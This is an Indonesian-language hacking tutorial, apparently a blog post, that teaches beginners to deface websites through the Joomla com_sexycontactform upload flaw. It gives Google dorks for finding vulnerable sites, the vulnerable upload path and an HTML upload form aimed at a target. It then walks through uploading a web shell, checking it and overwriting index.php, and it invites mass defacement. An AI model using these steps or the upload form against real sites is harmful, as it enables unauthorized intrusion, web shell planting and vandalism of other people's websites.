Assalamualaikum sobat..
Udah pada tau belum deface website teknik com_sexy?
Bagi yang newbie, nih _MisterNotFound_ ajarin :3
Tuk mastah , nyimak aje ye :v
-
Dork :
UMUM > inurl:/com_sexycontactform/
MY FAVORITE DORK > inurl:/components/com_sexycontactform/
-
Exploit :
/components/com_sexycontactform/fileupload/index.php
-
CSRF
NB : SAVE DENGAN FORMAT .html
<form method="POST"
action="http://www.TARGET.com/[path]/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>UNGGAH</button>
</form>
-
Script Deface sampeyan ;)
-
Masukkan dork ke search engine google.
-
Pilih target. Nah, kalo ini merupakan target
saya.
-
Masukkan exploitnya dibelakang url target. Jika vuln, maka akan tampil notice error.
NOTE : Jika ada path di url
target, maka sampeyan harus masukkan exploitnya dibelakang path nya
-
Kemudian seret Script Upload Button ke browser
yang sedang anda gunakan.
-
Upload file Shell sampeyan.
- Jika website vuln terhadap Shell, maka penampakannya seperti gambar dibawah ini.
-
Check Your Shell. Caranya, masukkan ‘exploit
check’ ini :
components/com_sexycontactform/fileupload/files/Your Shell.php
NOTE : Cek dulu, ada path nya gak
;)
-
Dan penampakan Shell yang sudah tertanam,
seperti gambar dibawah ini
-
Lalu terserah sampeyan mau diapakan tuh website.
Mau mass deface ya silahkan, mau nitip nick silahkan. Nah kalo mau tebas index
juga silahkan ;)
-
Cara Tebas index, seperti gambar dibawah ini
NOTE : CARI FILE INDEX.PHP . BIASANYA ADA DI DIREKTORI UTAMA DAN BERFORMAT .PHP
-
Copy-paste-kan script sampeyan di kolom
index.php
NOTE : Sebaiknya back-up dulu
script index aslinya ;)
-
Jika sudah selesai, tinggal klik SAVE
-
Penampakan setelah diperawani :)
-
Selesai.
Thanks for everything ;)